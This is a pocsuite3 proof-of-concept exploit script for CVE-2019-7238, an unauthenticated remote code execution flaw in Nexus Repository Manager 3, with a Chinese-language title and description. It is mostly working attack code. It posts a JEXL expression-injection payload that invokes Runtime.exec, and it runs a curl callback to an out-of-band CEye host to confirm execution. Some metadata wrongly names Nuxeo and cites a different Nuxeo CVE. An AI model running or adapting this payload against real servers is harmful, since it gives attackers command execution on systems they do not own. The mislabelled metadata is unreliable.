Nexus Repository Manager 3 访问控制缺失及远程代码执行漏洞(CVE-2019-7238)

#!/usr/bin/env python3 # -*- coding: utf-8 -*- # @Time : 2019/2/19 5:21 PM # @Author : w8ay # @File : nuxeo_unauthorized_command_execution.py import base64 from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.modules.ceye import CEye class TestPOC(POCBase): name = "Nexus Repository Manager(CVE-2019-7238) RCE" vulID = '97809' author = [''] vulType = 'Command Execution' version = '1.0' # default version: 1.0 references = ['https://blog.riskivy.com/nuxeo-rce-analysis-cve-2018-16341/?from=timeline&isappinstalled=0'] desc = '''在Nexus Repository Manager OSS/Pro 3.15 之前的版本中，由于某处功能缺乏访问控制，且未能正确处理用户传入的数据，导致远程且未经授权认证的攻击者，仅通过一个恶意的HTTP 请求，就可以在服务端执行任意Java 代码，获取系统权限。''' vulDate = '2019-2-15' createDate = '2019-2-15' updateDate = '2019-2-15' appName = 'Nuxeo' appVersion = '< 3.15' appPowerLink = 'https://help.sonatype.com/repomanager3' dork = 'nuxeo' samples = [] def _verify(self): '''verify mode''' result = {} ce = CEye() b = ce.build_request("nuxeo") uri = b["url"] flag = b["flag"] command = "curl {}".format(uri) payload = r'{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"format == \"raw\" or \"\".class.forName(\"java.lang.Runtime\").getRuntime().exec(\"' + command + r'\")"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":81}' headers = { "Content-Type": "application/json" } try: resp = requests.post(self.url + "/service/extdirect", data=payload, headers=headers) info = ce.exact_request(flag) if info == "nuxeo": result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url + "/service/extdirect" except Exception as e: logger.error(str(e)) return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output register_poc(TestPOC)